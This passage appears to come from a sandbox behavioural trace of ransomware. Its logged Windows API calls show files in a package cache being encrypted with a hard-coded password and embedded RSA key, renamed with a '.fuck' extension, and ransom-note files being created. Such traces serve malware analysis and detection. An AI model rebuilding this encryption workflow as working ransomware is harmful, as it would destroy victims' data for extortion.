pInfo=0x2868c38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2868c68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2868c70*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eab50) returned 1 [0238.093] CryptEncrypt (in: hKey=0x27eab50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.093] CryptEncrypt (in: hKey=0x27eab50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a360*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285a360*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.093] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a360, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.093] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.093] CryptEncrypt (in: hKey=0x27eab10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.093] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.093] CloseHandle (hObject=0xffffffff) returned 1 [0238.093] CloseHandle (hObject=0xffffffff) returned 1 [0238.093] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), bFailIfExists=0) returned 0 [0238.094] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x0) returned 0 [0238.094] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg")) returned 0 [0238.094] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.fuck" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.fuck")) returned 0 [0238.094] CryptDestroyHash (hHash=0x27eaa10) returned 1 [0238.094] CryptDestroyKey (hKey=0x27eab10) returned 1 [0238.094] CryptReleaseContext (hProv=0x285a9c0, dwFlags=0x0) returned 1 [0238.094] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.094] FindClose (in: hFindFile=0x28467e0 | out: hFindFile=0x28467e0) returned 1 [0238.095] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm")) returned 0xffffffff [0238.095] AreFileApisANSI () returned 1 [0238.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286cfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 137 [0238.095] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.095] GetLastError () returned 0x5 [0238.095] GetLastError () returned 0x5 [0238.095] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.095] FindClose (in: hFindFile=0x2845ea0 | out: hFindFile=0x2845ea0) returned 1 [0238.095] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.095] AreFileApisANSI () returned 1 [0238.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0238.095] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.096] GetLastError () returned 0x5 [0238.096] GetLastError () returned 0x5 [0238.096] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.096] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0238.096] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\readme_back_files.htm")) returned 0xffffffff [0238.096] AreFileApisANSI () returned 1 [0238.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0238.096] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.096] GetLastError () returned 0x5 [0238.096] GetLastError () returned 0x5 [0238.096] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.096] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27eacd0 [0238.097] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.097] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.097] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27ead90 [0238.098] FindNextFileA (in: hFindFile=0x27ead90, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.098] FindNextFileA (in: hFindFile=0x27ead90, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.098] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27eabd0 [0238.098] FindNextFileA (in: hFindFile=0x27eabd0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.098] FindNextFileA (in: hFindFile=0x27eabd0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.098] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.098] GetLastError () returned 0x5 [0238.098] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0238.098] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.099] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.099] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.099] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.099] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285acf0) returned 1 [0238.101] CryptCreateHash (in: hProv=0x285acf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.101] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.101] CryptHashData (hHash=0x27eac10, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.101] CryptDeriveKey (in: hProv=0x285acf0, Algid=0x6610, hBaseData=0x27eac10, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ea890) returned 1 [0238.101] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.101] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.101] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285ae88) returned 1 [0238.102] CryptImportPublicKeyInfo (in: hCryptProv=0x285ae88, dwCertEncodingType=0x1, pInfo=0x28692b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28692e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28692f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eab90) returned 1 [0238.102] CryptEncrypt (in: hKey=0x27eab90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.102] CryptEncrypt (in: hKey=0x27eab90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a030*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285a030*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.102] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a030, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.102] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.102] CryptEncrypt (in: hKey=0x27ea890, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.102] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.102] CloseHandle (hObject=0xffffffff) returned 1 [0238.102] CloseHandle (hObject=0xffffffff) returned 1 [0238.102] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0238.103] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.103] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg")) returned 0 [0238.103] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab.fuck")) returned 0 [0238.103] CryptDestroyHash (hHash=0x27eac10) returned 1 [0238.103] CryptDestroyKey (hKey=0x27ea890) returned 1 [0238.103] CryptReleaseContext (hProv=0x285acf0, dwFlags=0x0) returned 1 [0238.103] FindNextFileA (in: hFindFile=0x27eabd0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.103] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.104] GetLastError () returned 0x5 [0238.104] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0238.104] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x80) returned 0 [0238.104] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.105] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.105] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.105] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2858160) returned 1 [0238.108] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.108] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.108] CryptHashData (hHash=0x27ea9d0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.108] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x27ea9d0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ea950) returned 1 [0238.108] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.108] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.108] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285a2d8) returned 1 [0238.108] CryptImportPublicKeyInfo (in: hCryptProv=0x285a2d8, dwCertEncodingType=0x1, pInfo=0x286a228*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a258*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a260*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eac50) returned 1 [0238.108] CryptEncrypt (in: hKey=0x27eac50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.108] CryptEncrypt (in: hKey=0x27eac50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a690*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285a690*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.108] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a690, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.109] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.109] CryptEncrypt (in: hKey=0x27ea950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.109] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.109] CloseHandle (hObject=0xffffffff) returned 1 [0238.109] CloseHandle (hObject=0xffffffff) returned 1 [0238.109] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), bFailIfExists=0) returned 0 [0238.109] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x0) returned 0 [0238.109] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg")) returned 0 [0238.109] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.fuck" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.fuck")) returned 0 [0238.110] CryptDestroyHash (hHash=0x27ea9d0) returned 1 [0238.110] CryptDestroyKey (hKey=0x27ea950) returned 1 [0238.110] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0238.110] FindNextFileA (in: hFindFile=0x27eabd0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.110] FindClose (in: hFindFile=0x27eabd0 | out: hFindFile=0x27eabd0) returned 1 [0238.110] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" 